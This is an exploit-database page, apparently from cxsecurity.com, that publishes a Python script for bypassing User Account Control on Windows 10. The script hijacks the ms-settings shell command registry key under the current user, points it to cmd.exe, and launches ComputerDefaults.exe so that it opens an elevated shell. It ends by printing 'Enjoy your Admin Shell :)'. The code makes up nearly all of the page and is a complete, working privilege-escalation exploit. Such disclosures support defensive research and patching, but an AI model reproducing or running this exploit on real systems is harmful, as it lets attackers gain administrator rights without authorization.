Microsoft Windows 10 UAC Bypass By computerDefault

2018.10.23
Credit: Fabien Dromas
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/env python # # Exploit Title: Windows 10 UAC Bypass by computerDefault # Date: 2018-10-18 # Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com> # Twitter: st0rnpentest # # Vendor Homepage: www.microsoft.com # Version: Version 10.0.17134.285 # Tested on: Windows 10 pro Version 10.0.17134.285 # import os import sys import ctypes import _winreg def create_reg_key(key, value): try: _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command') registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE) _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value) _winreg.CloseKey(registry_key) except WindowsError: raise def exec_bypass_uac(cmd): try: create_reg_key('DelegateExecute', '') create_reg_key(None, cmd) except WindowsError: raise def bypass_uac(): try: current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__ cmd = "C:\windows\System32\cmd.exe" exec_bypass_uac(cmd) os.system(r'C:\windows\system32\ComputerDefaults.exe') return 1 except WindowsError: sys.exit(1) if __name__ == '__main__': if bypass_uac(): print "Enjoy your Admin Shell :)"


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top